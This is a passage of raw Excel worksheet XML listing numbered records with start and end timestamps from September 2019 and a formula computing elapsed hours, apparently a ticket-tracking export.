      <c r="A63" t="s">
        <v>968</v>
      </c>
      <c r="B63">
        <v>14562</v>
      </c>
      <c r="C63" t="s">
        <v>969</v>
      </c>
      <c r="D63" t="s">
        <v>7</v>
      </c>
      <c r="E63" s="1">
        <v>43729.184340277781</v>
      </c>
      <c r="F63" s="1">
        <v>43733.826840277776</v>
      </c>
      <c r="G63" t="s">
        <v>769</v>
      </c>
      <c r="H63" t="str">
        <f>TEXT(F63-E63,"[h]")</f>
        <v>111</v>
      </c>
    </row>
    <row r="64" spans="1:8" hidden="1">
      <c r="A64" t="s">
        <v>773</v>
      </c>
      <c r="B64">
        <v>14561</v>
      </c>
      <c r="C64" t="s">
        <v>970</v>
      </c>
      <c r="D64" t="s">
        <v>7</v>
      </c>
      <c r="E64" s="1">
        <v>43729.172881944447</v>
      </c>
      <c r="F64" s="1">
        <v>43734.685694444444</v>
      </c>
      <c r="G64" t="s">
        <v>474</v>
      </c>
      <c r="H64" t="str">
        <f>TEXT(F64-E64,"[h]")</f>
        <v>132</v>
      </c>
    </row>
    <row r="65" spans="1:8" hidden="1">
      <c r="A65" t="s">
        <v>971</v>
      </c>
      <c r="B65">
        <v>14559</v>
      </c>
      <c r="C65" t="s">
        <v>972</v>
      </c>
      <c r="D65" t="s">
        <v>7</v>
      </c>
      <c r="E65" s="1">
        <v>43728.903819444444</v>
      </c>
      <c r="F65" s="1">
        <v>43729.205081018517</v>
      </c>
      <c r="G65" t="s">
        <v>973</v>
      </c>
      <c r="H65" t="str">
        <f>TEXT(F65-E65,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="66" spans="1:8" hidden="1">
      <c r="A66" t="s">
        <v>974</v>
      </c>
      <c r="B66">
        <v>14558</v>
      </c>
      <c r="C66" t="s">
        <v>975</v>
      </c>
      <c r="D66" t="s">
        <v>7</v>
      </c>
      <c r="E66" s="1">
        <v>43728.877615740741</v>
      </c>
      <c r="F66" s="1">
        <v>43728.967974537038</v>
      </c>
      <c r="G66" t="s">
        <v>51</v>
      </c>
      <c r="H66" t="str">
        <f>TEXT(F66-E66,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="67" spans="1:8" hidden="1">
      <c r="A67" t="s">
        <v>965</v>
      </c>
      <c r="B67">
        <v>14557</v>
      </c>
      <c r="C67" t="s">
        <v>966</v>
      </c>
      <c r="D67" t="s">
        <v>7</v>
      </c>
      <c r="E67" s="1">
        <v>43728.802268518521</v>
      </c>
      <c r="F67" s="1">
        <v>43728.818067129629</v>
      </c>
      <c r="G67" t="s">
        <v>967</v>
      </c>
      <c r="H67" t="str">
        <f>TEXT(F67-E67,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="68" spans="1:8" hidden="1">
      <c r="A68" t="s">
        <v>976</v>
      </c>
      <c r="B68">
        <v>14555</v>
      </c>
      <c r="C68" t="s">
        <v>977</v>
      </c>
      <c r="D68" t="s">
        <v>7</v>
      </c>
      <c r="E68" s="1">
        <v>43728.44054398148</v>
      </c>
      <c r="F68" s="1">
        <v>43730.564502314817</v>
      </c>
      <c r="G68" t="s">
        <v>75</v>
      </c>
      <c r="H68" t="str">
        <f>TEXT(F68-E68,"[h]")</f>
        <v>50</v>
      </c>
    </row>
    <row r="69" spans="1:8" hidden="1">
      <c r="A69" t="s">
        <v>978</v>
      </c>
      <c r="B69">
        <v>14554</v>
      </c>
      <c r="C69" t="s">
        <v>979</v>
      </c>
      <c r="D69" t="s">
        <v>7</v>
      </c>
      <c r="E69" s="1">
        <v>43728.228831018518</v>
      </c>
      <c r="F69" s="1">
        <v>43728.890011574076</v>
      </c>
      <c r="G69" t="s">
        <v>28</v>
      </c>
      <c r="H69" t="str">
        <f>TEXT(F69-E69,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="70" spans="1:8" hidden="1">
      <c r="A70" t="s">
        <v>980</v>
      </c>
      <c r="B70">
        <v>14553</v>
      </c>
      <c r="C70" t="s">
        <v>981</v>
      </c>
      <c r="D70" t="s">
        <v>7</v>
      </c>
      <c r="E70" s="1">
        <v>43728.097662037035</v>
      </c>
      <c r="F70" s="1">
        <v>43740.011967592596</v>
      </c>
      <c r="G70" t="s">
        <v>118</v>
      </c>
      <c r="H70" t="str">
        <f>TEXT(F70-E70,"[h]")</f>
        <v>285</v>
      </c>
    </row>
    <row r="71" spans="1:8" hidden="1">
      <c r="A71" t="s">
        <v>982</v>
      </c>
      <c r="B71">
        <v>14552</v>
      </c>
      <c r="C71" t="s">
        <v>983</v>
      </c>
      <c r="D71" t="s">
        <v>7</v>
      </c>
      <c r="E71" s="1">
        <v>43728.053749999999</v>
      </c>
      <c r="F71" s="1">
        <v>43728.818067129629</v>
      </c>
      <c r="G71" t="s">
        <v>66</v>
      </c>
      <c r="H71" t="str">
        <f>TEXT(F71-E71,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="72" spans="1:8" hidden="1">
      <c r="A72" t="s">
        <v>984</v>
      </c>
      <c r="B72">
        <v>14551</v>
      </c>
      <c r="C72" t="s">
        <v>985</v>
      </c>
      <c r="D72" t="s">
        <v>7</v>
      </c>
      <c r="E72" s="1">
        <v>43727.922592592593</v>
      </c>
      <c r="F72" s="1">
        <v>43746.396990740737</v>
      </c>
      <c r="G72" t="s">
        <v>118</v>
      </c>
      <c r="H72" t="str">
        <f>TEXT(F72-E72,"[h]")</f>
        <v>443</v>
      </c>
    </row>
    <row r="73" spans="1:8" hidden="1">
      <c r="A73" t="s">
        <v>986</v>
      </c>
      <c r="B73">
        <v>14548</v>
      </c>
      <c r="C73" t="s">
        <v>987</v>
      </c>
      <c r="D73" t="s">
        <v>7</v>
      </c>
      <c r="E73" s="1">
        <v>43727.386562500003</v>
      </c>
      <c r="F73" s="1">
        <v>43731.813020833331</v>
      </c>
      <c r="G73" t="s">
        <v>60</v>
      </c>
      <c r="H73" t="str">
        <f>TEXT(F73-E73,"[h]")</f>
        <v>106</v>
      </c>
    </row>
    <row r="74" spans="1:8" hidden="1">
      <c r="A74" t="s">
        <v>988</v>
      </c>
      <c r="B74">
        <v>14545</v>
      </c>
      <c r="C74" t="s">
        <v>989</v>
      </c>
      <c r="D74" t="s">
        <v>7</v>
      </c>
      <c r="E74" s="1">
        <v>43726.990416666667</v>
      </c>
      <c r="F74" s="1">
        <v>43727.079398148147</v>
      </c>
      <c r="G74" t="s">
        <v>283</v>
      </c>
      <c r="H74" t="str">
        <f>TEXT(F74-E74,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="75" spans="1:8" hidden="1">
      <c r="A75" t="s">
        <v>990</v>
      </c>
      <c r="B75">
        <v>14538</v>
      </c>
      <c r="C75" t="s">
        <v>991</v>
      </c>
      <c r="D75" t="s">
        <v>7</v>
      </c>
      <c r="E75" s="1">
        <v>43725.963587962964</v>
      </c>
      <c r="F75" s="1">
        <v>43726.297152777777</v>
      </c>
      <c r="G75" t="s">
        <v>75</v>
      </c>
      <c r="H75" t="str">
        <f>TEXT(F75-E75,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="76" spans="1:8" hidden="1">
      <c r="A76" t="s">
        <v>992</v>
      </c>
      <c r="B76">
        <v>14535</v>
      </c>
      <c r="C76" t="s">
        <v>993</v>
      </c>
      <c r="D76" t="s">
        <v>7</v>
      </c>
      <c r="E76" s="1">
        <v>43725.878842592596</v>
      </c>
      <c r="F76" s="1">
        <v>43725.915694444448</v>
      </c>
      <c r="G76" t="s">
        <v>66</v>
      </c>
      <c r="H76" t="str">
        <f>TEXT(F76-E76,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="77" spans="1:8" hidden="1">
      <c r="A77" t="s">
        <v>994</v>
      </c>
      <c r="B77">
        <v>14534</v>
      </c>
      <c r="C77" t="s">
        <v>995</v>
      </c>
      <c r="D77" t="s">
        <v>7</v>
      </c>
      <c r="E77" s="1">
        <v>43725.855787037035</v>
      </c>
      <c r="F77" s="1">
        <v>43734.761122685188</v>
      </c>
      <c r="G77" t="s">
        <v>138</v>
      </c>
      <c r="H77" t="str">
        <f>TEXT(F77-E77,"[h]")</f>
        <v>213</v>
      </c>
    </row>
    <row r="78" spans="1:8">
      <c r="A78" t="s">
        <v>946</v>
      </c>
      <c r="B78">
        <v>14531</v>
      </c>
      <c r="C78" t="s">
        <v>947</v>
      </c>
      <c r="D78" t="s">
        <v>7</v>
      </c>
      <c r="E78" s="1">
        <v>43725.043888888889</v>
      </c>
      <c r="F78" s="1">
        <v>43727.866851851853</v>
      </c>
      <c r="G78" t="s">
        <v>948</v>
      </c>
      <c r="H78" t="str">
        <f>TEXT(F78-E78,"[h]")</f>
        <v>67</v>
      </c>
    </row>
    <row r="79" spans="1:8" hidden="1">
      <c r="A79" t="s">
        <v>996</v>
      </c>
      <c r="B79">
        <v>14529</v>
      </c>
      <c r="C79" t="s">
        <v>997</v>
      </c>
      <c r="D79" t="s">
        <v>7</v>
      </c>
      <c r="E79" s="1">
        <v>43724.941157407404</v>
      </c>
      <c r="F79" s="1">
        <v>43727.097743055558</v>
      </c>
      <c r="G79" t="s">
        <v>998</v>
      </c>
      <c r="H79" t="str">
        <f>TEXT(F79-E79,"[h]")</f>
        <v>51</v>
      </c>
    </row>
    <row r="80" spans="1:8" hidden="1">
      <c r="A80" t="s">
        <v>999</v>
      </c>
      <c r="B80">
        <v>14527</v>
      </c>
      <c r="C80" t="s">
        <v>1000</v>
      </c>
      <c r="D80" t="s">
        <v>7</v>
      </c>
      <c r="E80" s="1">
        <v>43724.723298611112</v>
      </c>
      <c r="F80" s="1">
        <v>43728.770335648151</v>
      </c>
      <c r="G80" t="s">
        <v>138</v>
      </c>
      <c r="H80" t="str">
        <f>TEXT(F80-E80,"[h]")</f>
        <v>97</v>
      </c>
    </row>
    <row r="81" spans="1:8">
      <c r="A81" t="s">
        <v>1001</v>
      </c>
      <c r="B81">
        <v>14526</v>
      </c>
      <c r="C81" t="s">
        <v>1002</v>
      </c>
      <c r="D81" t="s">
        <v>7</v>
      </c>
      <c r="E81" s="1">
        <v>43724.404560185183</v>
      </c>
      <c r="F81" s="1">
        <v>43724.756724537037</v>
      </c>
      <c r="G81" t="s">
        <v>25</v>
      </c>
      <c r="H81" t="str">
        <f>TEXT(F81-E81,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="82" spans="1:8" hidden="1">
      <c r="A82" t="s">
        <v>1003</v>
      </c>
      <c r="B82">
        <v>14525</v>
      </c>
      <c r="C82" t="s">
        <v>1004</v>
      </c>
      <c r="D82" t="s">
        <v>7</v>
      </c>
      <c r="E82" s="1">
        <v>43724.397627314815</v>
      </c>
      <c r="F82" s="1">
        <v>43727.895046296297</v>
      </c>
      <c r="G82" t="s">
        <v>1005</v>
      </c>
      <c r="H82" t="str">
        <f>TEXT(F82-E82,"[h]")</f>
        <v>83</v>
      </c>
    </row>
    <row r="83" spans="1:8" hidden="1">
      <c r="A83" t="s">
        <v>1006</v>
      </c>
      <c r="B83">
        <v>14523</v>
      </c>
      <c r="C83" t="s">
        <v>1007</v>
      </c>
      <c r="D83" t="s">
        <v>7</v>
      </c>
      <c r="E83" s="1">
        <v>43724.086956018517</v>
      </c>
      <c r="F83" s="1">
        <v>43724.406527777777</v>
      </c>
      <c r="G83" t="s">
        <v>769</v>
      </c>
      <c r="H83" t="str">
        <f>TEXT(F83-E83,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="84" spans="1:8">
      <c r="A84" t="s">
        <v>1008</v>
      </c>
      <c r="B84">
        <v>14522</v>
      </c>
      <c r="C84" t="s">
        <v>1009</v>
      </c>
      <c r="D84" t="s">
        <v>7</v>
      </c>
      <c r="E84" s="1">
        <v>43723.989548611113</v>
      </c>
      <c r="F84" s="1">
        <v>43727.866851851853</v>
      </c>
      <c r="G84" t="s">
        <v>948</v>
      </c>
      <c r="H84" t="str">
        <f>TEXT(F84-E84,"[h]")</f>
        <v>93</v>
      </c>
    </row>
    <row r="85" spans="1:8" hidden="1">
      <c r="A85" t="s">
        <v>1010</v>
      </c>
      <c r="B85">
        <v>14520</v>
      </c>
      <c r="C85" t="s">
        <v>1011</v>
      </c>
      <c r="D85" t="s">
        <v>7</v>
      </c>
      <c r="E85" s="1">
        <v>43723.931516203702</v>
      </c>
      <c r="F85" s="1">
        <v>43724.422268518516</v>
      </c>
      <c r="G85" t="s">
        <v>66</v>
      </c>
      <c r="H85" t="str">
        <f>TEXT(F85-E85,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="86" spans="1:8" hidden="1">
      <c r="A86" t="s">
        <v>1014</v>
      </c>
      <c r="B86">
        <v>14518</v>
      </c>
      <c r="C86" t="s">
        <v>1015</v>
      </c>
      <c r="D86" t="s">
        <v>7</v>
      </c>
      <c r="E86" s="1">
        <v>43723.731874999998</v>
      </c>
      <c r="F86" s="1">
        <v>43728.355231481481</v>
      </c>
      <c r="G86" t="s">
        <v>138</v>
      </c>
      <c r="H86" t="str">
        <f>TEXT(F86-E86,"[h]")</f>
        <v>110</v>
      </c>
    </row>
    <row r="87" spans="1:8" hidden="1">
      <c r="A87" t="s">
        <v>1018</v>
      </c>
      <c r="B87">
        <v>14514</v>
      </c>
      <c r="C87" t="s">
        <v>1019</v>
      </c>
      <c r="D87" t="s">
        <v>7</v>
      </c>
      <c r="E87" s="1">
        <v>43723.160937499997</v>
      </c>
      <c r="F87" s="1">
        <v>43724.276307870372</v>
      </c>
      <c r="G87" t="s">
        <v>1020</v>
      </c>
      <c r="H87" t="str">
        <f>TEXT(F87-E87,"[h]")</f>
        <v>26</v>
      </c>
    </row>
    <row r="88" spans="1:8">
      <c r="A88" t="s">
        <v>1027</v>
      </c>
      <c r="B88">
        <v>14511</v>
      </c>
      <c r="C88" t="s">
        <v>1028</v>
      </c>
      <c r="D88" t="s">
        <v>7</v>
      </c>
      <c r="E88" s="1">
        <v>43722.841817129629</v>
      </c>
      <c r="F88" s="1">
        <v>43724.275462962964</v>
      </c>
      <c r="G88" t="s">
        <v>31</v>
      </c>
      <c r="H88" t="str">
        <f>TEXT(F88-E88,"[h]")</f>
        <v>34</v>
      </c>
    </row>
    <row r="89" spans="1:8" hidden="1">
      <c r="A89" t="s">
        <v>1029</v>
      </c>
      <c r="B89">
        <v>14510</v>
      </c>
      <c r="C89" t="s">
        <v>1030</v>
      </c>
      <c r="D89" t="s">
        <v>7</v>
      </c>
      <c r="E89" s="1">
        <v>43722.8281712963</v>
      </c>
      <c r="F89" s="1">
        <v>43723.222812499997</v>
      </c>
      <c r="G89" t="s">
        <v>1031</v>
      </c>
      <c r="H89" t="str">
        <f>TEXT(F89-E89,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="90" spans="1:8">
      <c r="A90" t="s">
        <v>1032</v>
      </c>
      <c r="B90">
        <v>14509</v>
      </c>
      <c r="C90" t="s">
        <v>1033</v>
      </c>
      <c r="D90" t="s">
        <v>7</v>
      </c>
      <c r="E90" s="1">
        <v>43722.712523148148</v>
      </c>
      <c r="F90" s="1">
        <v>43722.801168981481</v>
      </c>
      <c r="G90" t="s">
        <v>713</v>
      </c>
      <c r="H90" t="str">
        <f>TEXT(F90-E90,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="91" spans="1:8" hidden="1">
      <c r="A91" t="s">
        <v>773</v>
      </c>
      <c r="B91">
        <v>14506</v>
      </c>
      <c r="C91" t="s">
        <v>1034</v>
      </c>
      <c r="D91" t="s">
        <v>7</v>
      </c>
      <c r="E91" s="1">
        <v>43722.014374999999</v>
      </c>
      <c r="F91" s="1">
        <v>43722.076967592591</v>
      </c>
      <c r="G91" t="s">
        <v>919</v>
      </c>
      <c r="H91" t="str">
        <f>TEXT(F91-E91,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="92" spans="1:8">
      <c r="A92" t="s">
        <v>1035</v>
      </c>
      <c r="B92">
        <v>14504</v>
      </c>
      <c r="C92" t="s">
        <v>1036</v>
      </c>
      <c r="D92" t="s">
        <v>7</v>
      </c>
      <c r="E92" s="1">
        <v>43721.95621527778</v>
      </c>
      <c r="F92" s="1">
        <v>43722.135625000003</v>
      </c>
      <c r="G92" t="s">
        <v>713</v>
      </c>
      <c r="H92" t="str">
        <f>TEXT(F92-E92,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="93" spans="1:8" hidden="1">
      <c r="A93" t="s">
        <v>1037</v>
      </c>
      <c r="B93">
        <v>14503</v>
      </c>
      <c r="C93" t="s">
        <v>1038</v>
      </c>
      <c r="D93" t="s">
        <v>7</v>
      </c>
      <c r="E93" s="1">
        <v>43721.951562499999</v>
      </c>
      <c r="F93" s="1">
        <v>43722.70921296296</v>
      </c>
      <c r="G93" t="s">
        <v>255</v>
      </c>
      <c r="H93" t="str">
        <f>TEXT(F93-E93,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="94" spans="1:8">
      <c r="A94" t="s">
        <v>1016</v>
      </c>
      <c r="B94">
        <v>14501</v>
      </c>
      <c r="C94" t="s">
        <v>1017</v>
      </c>
      <c r="D94" t="s">
        <v>7</v>
      </c>
      <c r="E94" s="1">
        <v>43721.922071759262</v>
      </c>
      <c r="F94" s="1">
        <v>43723.535231481481</v>
      </c>
      <c r="G94" t="s">
        <v>948</v>
      </c>
      <c r="H94" t="str">
        <f>TEXT(F94-E94,"[h]")</f>
        <v>38</v>
      </c>
    </row>
    <row r="95" spans="1:8" hidden="1">
      <c r="A95" t="s">
        <v>773</v>
      </c>
      <c r="B95">
        <v>14500</v>
      </c>
      <c r="C95" t="s">
        <v>1041</v>
      </c>
      <c r="D95" t="s">
        <v>7</v>
      </c>
      <c r="E95" s="1">
        <v>43721.644583333335</v>
      </c>
      <c r="F95" s="1">
        <v>43721.6950462963</v>
      </c>
      <c r="G95" t="s">
        <v>445</v>
      </c>
      <c r="H95" t="str">
        <f>TEXT(F95-E95,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="96" spans="1:8">
      <c r="A96" t="s">
        <v>1042</v>
      </c>
      <c r="B96">
        <v>14499</v>
      </c>
      <c r="C96" t="s">
        <v>1043</v>
      </c>
      <c r="D96" t="s">
        <v>7</v>
      </c>
      <c r="E96" s="1">
        <v>43721.411793981482</v>
      </c>
      <c r="F96" s="1">
        <v>43721.645775462966</v>
      </c>
      <c r="G96" t="s">
        <v>1044</v>
      </c>
      <c r="H96" t="str">
        <f>TEXT(F96-E96,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="97" spans="1:8" hidden="1">
      <c r="A97" t="s">
        <v>1012</v>
      </c>
      <c r="B97">
        <v>14498</v>
      </c>
      <c r="C97" t="s">
        <v>1013</v>
      </c>
      <c r="D97" t="s">
        <v>7</v>
      </c>
      <c r="E97" s="1">
        <v>43721.401365740741</v>
      </c>
      <c r="F97" s="1">
        <v>43723.752789351849</v>
      </c>
      <c r="G97" t="s">
        <v>769</v>
      </c>
      <c r="H97" t="str">
        <f>TEXT(F97-E97,"[h]")</f>
        <v>56</v>
      </c>
    </row>
    <row r="98" spans="1:8" hidden="1">
      <c r="A98" t="s">
        <v>1045</v>
      </c>
      <c r="B98">
        <v>14495</v>
      </c>
      <c r="C98" t="s">
        <v>1046</v>
      </c>
      <c r="D98" t="s">
        <v>7</v>
      </c>
      <c r="E98" s="1">
        <v>43720.837858796294</v>
      </c>
      <c r="F98" s="1">
        <v>43721.805613425924</v>
      </c>
      <c r="G98" t="s">
        <v>1047</v>
      </c>
      <c r="H98" t="str">
        <f>TEXT(F98-E98,"[h]")</f>
        <v>23</v>
      </c>
    </row>
    <row r="99" spans="1:8">
      <c r="A99" t="s">
        <v>1048</v>
      </c>
      <c r="B99">
        <v>14493</v>
      </c>
      <c r="C99" t="s">
        <v>1049</v>
      </c>
      <c r="D99" t="s">
        <v>7</v>
      </c>
      <c r="E99" s="1">
        <v>43720.773923611108</v>
      </c>
      <c r="F99" s="1">
        <v>43720.857291666667</v>
      </c>
      <c r="G99" t="s">
        <v>1044</v>
      </c>
      <c r="H99" t="str">
        <f>TEXT(F99-E99,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="100" spans="1:8" hidden="1">
      <c r="A100" t="s">
        <v>1050</v>
      </c>
      <c r="B100">
        <v>14491</v>
      </c>
      <c r="C100" t="s">
        <v>1051</v>
      </c>
      <c r="D100" t="s">
        <v>7</v>
      </c>
      <c r="E100" s="1">
        <v>43720.345717592594</v>
      </c>
      <c r="F100" s="1">
        <v>43724.422268518516</v>
      </c>
      <c r="G100" t="s">
        <v>75</v>
      </c>
      <c r="H100" t="str">
        <f>TEXT(F100-E100,"[h]")</f>
        <v>97</v>
      </c>
    </row>
    <row r="101" spans="1:8">
      <c r="A101" t="s">
        <v>1039</v>
      </c>
      <c r="B101">
        <v>14490</v>
      </c>
      <c r="C101" t="s">
        <v>1040</v>
      </c>
      <c r="D101" t="s">
        <v>7</v>
      </c>
      <c r="E101" s="1">
        <v>43720.276064814818</v>
      </c>
      <c r="F101" s="1">
        <v>43720.849374999998</v>
      </c>
      <c r="G101" t="s">
        <v>189</v>
      </c>
      <c r="H101" t="str">
        <f>TEXT(F101-E101,"[h]")</f>
        <v>13</v>
      </c>
    </row>
    <row r="102" spans="1:8" hidden="1">
      <c r="A102" t="s">
        <v>1052</v>
      </c>
      <c r="B102">
        <v>14488</v>
      </c>
      <c r="C102" t="s">
        <v>1053</v>
      </c>
      <c r="D102" t="s">
        <v>7</v>
      </c>
      <c r="E102" s="1">
        <v>43719.987569444442</v>
      </c>
      <c r="F102" s="1">
        <v>43731.288831018515</v>
      </c>
      <c r="G102" t="s">
        <v>138</v>
      </c>
      <c r="H102" t="str">
        <f>TEXT(F102-E102,"[h]")</f>
        <v>271</v>
      </c>
    </row>
    <row r="103" spans="1:8">
      <c r="A103" t="s">
        <v>1054</v>
      </c>
      <c r="B103">
        <v>14486</v>
      </c>
      <c r="C103" t="s">
        <v>1055</v>
      </c>
      <c r="D103" t="s">
        <v>7</v>
      </c>
      <c r="E103" s="1">
        <v>43719.854988425926</v>
      </c>
      <c r="F103" s="1">
        <v>43719.891504629632</v>
      </c>
      <c r="G103" t="s">
        <v>126</v>
      </c>
      <c r="H103" t="str">
        <f>TEXT(F103-E103,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="104" spans="1:8" hidden="1">
      <c r="A104" t="s">
        <v>1056</v>
      </c>
      <c r="B104">
        <v>14485</v>
      </c>
      <c r="C104" t="s">
        <v>1057</v>
      </c>
      <c r="D104" t="s">
        <v>7</v>
      </c>
      <c r="E104" s="1">
        <v>43719.741111111114</v>
      </c>
      <c r="F104" s="1">
        <v>43720.973425925928</v>
      </c>
      <c r="G104" t="s">
        <v>174</v>
      </c>
      <c r="H104" t="str">
        <f>TEXT(F104-E104,"[h]")</f>
        <v>29</v>
      </c>
    </row>
    <row r="105" spans="1:8" hidden="1">
      <c r="A105" t="s">
        <v>1058</v>
      </c>
      <c r="B105">
        <v>14484</v>
      </c>
      <c r="C105" t="s">
        <v>1059</v>
      </c>
      <c r="D105" t="s">
        <v>7</v>
      </c>
      <c r="E105" s="1">
        <v>43719.706157407411</v>
      </c>
      <c r="F105" s="1">
        <v>43720.969328703701</v>
      </c>
      <c r="G105" t="s">
        <v>174</v>
      </c>
      <c r="H105" t="str">
        <f>TEXT(F105-E105,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="106" spans="1:8">
      <c r="A106" t="s">
        <v>1021</v>
      </c>
      <c r="B106">
        <v>14483</v>
      </c>
      <c r="C106" t="s">
        <v>1022</v>
      </c>
      <c r="D106" t="s">
        <v>7</v>
      </c>
      <c r="E106" s="1">
        <v>43719.69703703704</v>
      </c>
      <c r="F106" s="1">
        <v>43720.235451388886</v>
      </c>
      <c r="G106" t="s">
        <v>1023</v>
      </c>
      <c r="H106" t="str">
        <f>TEXT(F106-E106,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="107" spans="1:8" hidden="1">
      <c r="A107" t="s">
        <v>1060</v>
      </c>
      <c r="B107">
        <v>14477</v>
      </c>
      <c r="C107" t="s">
        <v>1061</v>
      </c>
      <c r="D107" t="s">
        <v>7</v>
      </c>
      <c r="E107" s="1">
        <v>43719.312754629631</v>
      </c>
      <c r="F107" s="1">
        <v>43721.406747685185</v>
      </c>
      <c r="G107" t="s">
        <v>174</v>
      </c>
      <c r="H107" t="str">
        <f>TEXT(F107-E107,"[h]")</f>
        <v>50</v>
      </c>
    </row>
    <row r="108" spans="1:8">
      <c r="A108" t="s">
        <v>1062</v>
      </c>
      <c r="B108">
        <v>14472</v>
      </c>
      <c r="C108" t="s">
        <v>1063</v>
      </c>
      <c r="D108" t="s">
        <v>7</v>
      </c>
      <c r="E108" s="1">
        <v>43718.657141203701</v>
      </c>
      <c r="F108" s="1">
        <v>43719.986666666664</v>
      </c>
      <c r="G108" t="s">
        <v>16</v>
      </c>
      <c r="H108" t="str">
        <f>TEXT(F108-E108,"[h]")</f>
        <v>31</v>
      </c>
    </row>
    <row r="109" spans="1:8" hidden="1">
      <c r="A109" t="s">
        <v>1064</v>
      </c>
      <c r="B109">
        <v>14470</v>
      </c>
      <c r="C109" t="s">
        <v>1065</v>
      </c>
      <c r="D109" t="s">
        <v>7</v>
      </c>
      <c r="E109" s="1">
        <v>43718.416458333333</v>
      </c>
      <c r="F109" s="1">
        <v>43733.832569444443</v>
      </c>
      <c r="G109" t="s">
        <v>510</v>
      </c>
      <c r="H109" t="str">
        <f>TEXT(F109-E109,"[h]")</f>
        <v>369</v>
      </c>
    </row>
    <row r="110" spans="1:8">
      <c r="A110" t="s">
        <v>1066</v>
      </c>
      <c r="B110">
        <v>14469</v>
      </c>
      <c r="C110" t="s">
        <v>1067</v>
      </c>
      <c r="D110" t="s">
        <v>7</v>
      </c>
      <c r="E110" s="1">
        <v>43718.39707175926</v>
      </c>
      <c r="F110" s="1">
        <v>43753.850393518522</v>
      </c>
      <c r="G110" t="s">
        <v>1068</v>
      </c>
      <c r="H110" t="str">
        <f>TEXT(F110-E110,"[h]")</f>
        <v>850</v>
      </c>
    </row>
    <row r="111" spans="1:8" hidden="1">
      <c r="A111" t="s">
        <v>1069</v>
      </c>
      <c r="B111">
        <v>14466</v>
      </c>
      <c r="C111" t="s">
        <v>1070</v>
      </c>
      <c r="D111" t="s">
        <v>7</v>
      </c>
      <c r="E111" s="1">
        <v>43717.95003472222</v>
      </c>
      <c r="F111" s="1">
        <v>43739.860925925925</v>
      </c>
      <c r="G111" t="s">
        <v>66</v>
      </c>
      <c r="H111" t="str">
        <f>TEXT(F111-E111,"[h]")</f>
        <v>525</v>
      </c>
    </row>
    <row r="112" spans="1:8" hidden="1">
      <c r="A112" t="s">
        <v>1071</v>
      </c>
      <c r="B112">
        <v>14465</v>
      </c>
      <c r="C112" t="s">
        <v>1072</v>
      </c>
      <c r="D112" t="s">
        <v>7</v>
      </c>
      <c r="E112" s="1">
        <v>43717.756724537037</v>
      </c>
      <c r="F112" s="1">
        <v>43720.277581018519</v>
      </c>
      <c r="G112" t="s">
        <v>769</v>
      </c>
      <c r="H112" t="str">
        <f>TEXT(F112-E112,"[h]")</f>
        <v>60</v>
      </c>
    </row>
    <row r="113" spans="1:8">
      <c r="A113" t="s">
        <v>1073</v>
      </c>
      <c r="B113">
        <v>14464</v>
      </c>
      <c r="C113" t="s">
        <v>1074</v>
      </c>
      <c r="D113" t="s">
        <v>7</v>
      </c>
      <c r="E113" s="1">
        <v>43717.573136574072</v>
      </c>
      <c r="F113" s="1">
        <v>43720.89539351852</v>
      </c>
      <c r="G113" t="s">
        <v>19</v>
      </c>
      <c r="H113" t="str">
        <f>TEXT(F113-E113,"[h]")</f>
        <v>79</v>
      </c>
    </row>
    <row r="114" spans="1:8">
      <c r="A114" t="s">
        <v>1075</v>
      </c>
      <c r="B114">
        <v>14463</v>
      </c>
      <c r="C114" t="s">
        <v>1076</v>
      </c>
      <c r="D114" t="s">
        <v>7</v>
      </c>
      <c r="E114" s="1">
        <v>43717.555567129632</v>
      </c>
      <c r="F114" s="1">
        <v>43717.817372685182</v>
      </c>
      <c r="G114" t="s">
        <v>1077</v>
      </c>
      <c r="H114" t="str">
        <f>TEXT(F114-E114,"[h]")</f>
        <v>6</v>
      </c>
    </row>
    <row r="115" spans="1:8" hidden="1">
      <c r="A115" t="s">
        <v>1078</v>
      </c>
      <c r="B115">
        <v>14460</v>
      </c>
      <c r="C115" t="s">
        <v>1079</v>
      </c>
      <c r="D115" t="s">
        <v>7</v>
      </c>
      <c r="E115" s="1">
        <v>43717.353993055556</v>
      </c>
      <c r="F115" s="1">
        <v>43717.7028125</v>
      </c>
      <c r="G115" t="s">
        <v>60</v>
      </c>
      <c r="H115" t="str">
        <f>TEXT(F115-E115,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="116" spans="1:8" hidden="1">
      <c r="A116" t="s">
        <v>1080</v>
      </c>
      <c r="B116">
        <v>14459</v>
      </c>
      <c r="C116" t="s">
        <v>1081</v>
      </c>
      <c r="D116" t="s">
        <v>7</v>
      </c>
      <c r="E116" s="1">
        <v>43717.173483796294</v>
      </c>
      <c r="F116" s="1">
        <v>43717.903784722221</v>
      </c>
      <c r="G116" t="s">
        <v>37</v>
      </c>
      <c r="H116" t="str">
        <f>TEXT(F116-E116,"[h]")</f>
        <v>17</v>
      </c>
    </row>
    <row r="117" spans="1:8">
      <c r="A117" t="s">
        <v>1082</v>
      </c>
      <c r="B117">
        <v>14458</v>
      </c>
      <c r="C117" t="s">
        <v>1083</v>
      </c>
      <c r="D117" t="s">
        <v>7</v>
      </c>
      <c r="E117" s="1">
        <v>43717.075127314813</v>
      </c>
      <c r="F117" s="1">
        <v>43717.163298611114</v>
      </c>
